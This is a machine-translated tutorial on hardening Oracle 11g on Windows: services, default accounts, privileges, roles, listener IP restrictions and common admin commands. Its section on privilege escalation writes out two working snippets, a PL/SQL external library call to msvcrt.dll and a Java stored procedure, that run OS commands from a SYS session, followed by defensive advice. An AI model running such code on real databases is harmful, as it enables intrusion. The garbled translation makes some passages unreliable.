A tutorial on summarizing Oracle Database Security Configuration Guidelines

0X01 test Environment

Operating system: Window Server 2008 x64 oracle:oracle 11.2.0.1.0

0x02 Oracle Permissions Introduction

An Oracle instance is a database, and creating a new database produces a new instance, and an instance runs a process independently.

A user corresponds to a scenario under this scenario when the user creates a new data object (such as a table). Your own access can be accessed directly, and other users have access to the schema name. Object name.

The user defaults to the permissions of the data object under its own scheme, and no other user has the appropriate permissions. Sys,system has permissions for all scenarios by default.

When a user logs on to an Oracle instance, you first need to determine whether the user has logon rights, if not, can not log in directly, if there is, the login succeeded. After a successful login, the user has the right to decide what can be done, in an operation, if the permissions, the operation succeeds, if there is no permission, the operation failed.

Oracle has two core processes, one is Oracle service process, the other is the listener process, when the external connection to Oracle, the first is the access to the listening process, by the listener process according to the database instance you access to the corresponding Oracle instance process processing.

0x03 Oracle System Services

The Oracle 11g installed in Window Server 2008 will have a total of seven services, the meanings of which are:

A. Oracle ORCL VSS Writer Service:

Oracle Volume Mapping copy write service, VSS (Volume Shadow Copy service) enables the storage infrastructure (such as disks, arrays, etc.) to create a high-fidelity point-in-time image, the mapped copy (Shadow copy). It can create a mapped copy on multiple volumes or on a single volume without affecting the system's ability to do so. (must not be started)

B. ORACLEDBCONSOLEORCL:

Oracle Database Console service, ORCL is an instance identity of Oracle, and the default instance is ORCL. You need to start this service when you are running Enterprise Manager (Enterprise Manager OEM). (must not be started)

C. ORACLEJOBSCHEDULERORCL:

Oracle Job Scheduler (timer) service, ORCL is an Oracle instance identity. (must not be started)

D. Oraclemtsrecoveryservice:

Server-side control. This service allows the database to act as a resource manager for a Microsoft Transaction Server MTS, com/com+ objects, and transactions under a distributed environment. (must not be started)

E. Oracleoradb11g_home1clragent:

Part of the Oracle database. NET Extension Service. (must not be started)

F. Oracleoradb11g_home1tnslistener:

Listener service, which is required only when the database requires remote access. (not mandatory, but must be started for external access).

G. ORACLESERVICEORCL:

Database service (database instance) is the Oracle Core service, which is the foundation of database startup, and the Oracle database starts correctly only if the service is started. (Must Start)

So what services do you need to start when you're developing?

For starters, if you only use Oracle's own sql*plus, just start ORACLESERVICEORCL, if you use a third-party tool such as Pl/sql Developer, Oracleoradb11g_ Home1tnslistener service should also be opened. ORACLEDBCONSOLEORCL is going into web-based em must be turned on and the rest of the service is rarely used.

0x04 Oracle Default Account

After oracle11g installation, there will be many system default account, in addition to 4, the other is locked, if no special purpose, please do not open. The other 4 were:

SYS user SYS, when a database is created, the SYS user is created and granted the DBA role by default, and the basic tables and views in all database data dictionaries are stored in a scenario named SYS, which is essential for the operation of the Oracle database. To maintain the authenticity of the data dictionary, the tables in the SYS scheme can only be maintained by the system, they cannot be modified by any user or database administrator, and no user can create a table in the SYS scheme.

System user system, like SYS, when an Oracle database is created, the system user is created by default and given a DBA role to create tables or views that display management information, as well as content tables or views that are used by various Oracle database applications and tools.

DBSNMP user Dbsnmp is a user in an Oracle database for the Intelligent agent (intelligent agent) that monitors and manages database-related performance and cannot extract relevant data information if the user is stopped.

Sysman user Sysman is a user in the Oracle Database for EM management and can be deleted or locked out if you do not use the user.

All the above 4 account passwords are set at the time of installation of the password, because in general, DBSNMP and Sysman users will not be used and is omitted, recommended locking.

0x05 Oracle Permissions and Roles

A. Authority

Oracle permissions are divided into system permissions and object permissions, and when a user is just established, the user does not have any permissions or perform any action. If you want to perform a specific database operation, you must grant it permissions to the system. If a user wants to access an object from another scenario, he or she must be granted permission to the object.

System permissions are the right to execute a specific type of SQL command that controls one or a set of database operations that a user can perform. For example, when a user has a CREATE TABLE permission, a table can be built in its scenario, and a table can be built in any scenario when the user has the Create any table permission. Oracle provides more than 100 system privileges.

Common system permissions are shown in the following table:

Create Session Connection Database

Create View creating views

Create procedure creating procedures, functions, packages

Create cluster to build a cluster

CREATE table Creating tables

Create public synonym creating synonyms

Create TRIGGER creating triggers

Common object permissions are shown in the following table:

Alter MODIFY table structure

Delete Deletes data

Select query data

Insert Add Data

Update modify Data

Index indexed on a table

References reference

Execute Execute

Note: You can use all instead of SELECT, UPDATE, INSERT, ALTER, INDEX, delete

B. Role

Oracle roles are divided into system roles and custom roles, and custom roles can specify the appropriate permissions as needed, and the system role focuses on the following 3:

DBA: With full privileges, the system has the highest privileges, and only DBAs can create the database structure.

RESOURCE: Users with RESOURCE permissions can create entities only and cannot create database structures.

Connect: Users with Connect permissions can only log on and cannot create entities and database structures.

For ordinary users: Grant connect, Resource role.

For DBA administration User: Grant Connect,resource, DBA role.

0x06 How Oracle establishes a Web site to connect users

Programme I:

Use System to create a new user name and give the Connect,resource role

Log on with the new user, and then create the table that you want

Use System login to revoke the Connect,resource role of the new user

Using system logon, grant new user Create session permissions

Use system logon to give new users permission to the users table space

Programme II:

Use System login to create the tables needed for your Web site

Use System login to create a user name

With system logon, Grant creates the system permissions for the create session of the user, and then gives the corresponding object permissions to the table as required by the site.

Use system logon to give new users permission to the users table space

The Web site accesses the database using the form "system. Table name."

0x07 Oracle Security Configuration Scheme

1. Restrict access to IP

Method One:

firewall specifies that the access IP of the listening port is specified through iptables in Windows through the access Ip,linux specified on the listening port in Windows Firewall.

Method Two:

The access IP of the listening port can be specified by IPSec in Windows.

Method Three:

You can specify the following lines in the file $oracle_home/network/admin/sqlnet.ora on the server by specifying accessible IP from the ORACLE listener:

Tcp.validnode_checking = yes

Allow access to IP

Tcp.invited_nodes = (ip1,ip2 ...)

IP not allowed to access

tcp.excluded_nodes= (ip1,ip2,......)

Modify the port to modify the listener's port to reduce the amount of scanning

Turning off unnecessary services can turn off unnecessary services to reduce external access, except that ORACLESERVICEORCL and Oracleoradb11g_home1tnslistener must be turned on. In particular, the opening of the ORACLEDBCONSOLEORCL service will enable the web version of EM, Access port at 1158, if you do not need to close this service.

All users need to set a strong password in the setting of the password needs to set more than 8 strong password, and contains case, number, special characters.

Close unwanted users Oracle will have 4 unlocked accounts by default, and it is recommended to lock DBSNMP and Sysman.

Privileged account processing restricts database Super Administrator remote logins. A. Set up Remote_login_passwordfile=none B in SPFile. Set sqlnet in Sqlnet.ora. Authentication_services=none Disable automatic login for SYSDBA role

Open log can open the log to audit the database, but also consumes resources, can be operated according to the actual situation.

Web site use of the database account permissions can be minimized according to the Web site written above to connect the database account recommended by the establishment of the program.

Reasonable use of database process account database process account use a lower privilege account, create a new user, add the data directory Write permission, if the configuration after running, you can go back to the second, give the entire database directory Full Control permissions.

Reasonable configuration database process account permissions to disk do not give the database directory outside the special permissions, it is best to read permissions are not given, you can arrange according to the actual situation, the principle is that the database directory to the right to ensure normal operation, the other directory can not give.

0x08 Oracle Power and Defense points

1. Adoption of the right to Pl/sql

Create or replace library Exec_shell as ' $ORACLE _homebinmsvcrt.dll '; Create or Replace procedure execmd (command in char) is external name "System" library Exec_shell language C; /exec execmd (' net user >netaaa.txt ');

2. Use Java to extract power

CREATE OR REPLACE and RESOLVE JAVA SOURCE NAMED "Javacmd" as import java.lang.*; Import java.io.*; public class Javacmd {public static void ExecCommand (String command) throws IOException {Runtime.getruntime (). EXEC (comm and); } }; /CREATE OR REPLACE PROCEDURE javacmdproc (P_command in VARCHAR2) as LANGUAGE JAVA NAME ' Javacmd.execcommand (java.lang.St Ring) '; /exec Javacmdproc (' cmd.exe/c net user > Netaaa.txt ');

Both of these methods, if using SYS, can be used to claim success, and ordinary rights users cannot complete the above operation. So the source of defense is only the management of the SYS privileged account, but if the real privileged account is captured by hackers, the method will only use the low Access database process account, as well as the control of the process account to disk permissions, so that the operation can reduce the ability of hackers to operate to the minimum. As for the first elevation of the low privilege Oracle account to DBA authority, and then the operation of the system authority is not discussed in this article, but also ask Daniel to provide a better way.

0x09 Oracle Common Operations Command

1. Connecting to the database

Conn SYS/MIMA@ORCL as SYSDBA;

2. New User

Create user yonghuming identified by Mima;

3. Give user authorization

Grant Connect, resource to yonghuming; Grant create session to Yonghuming; Alter user yonghuming quota unlimited on USERS; Grant unlimited tablespace to yonghuming; Grant SELECT on testable to Yonghuming;

4. Cancellation of Authorization

Revoke connect, resource from yonghuming;

5. Delete Lock (unlock) account

View Sourceprint?alter user yonghuming lock; alter user yonghuming unlock; Drop user yonghuming cascade;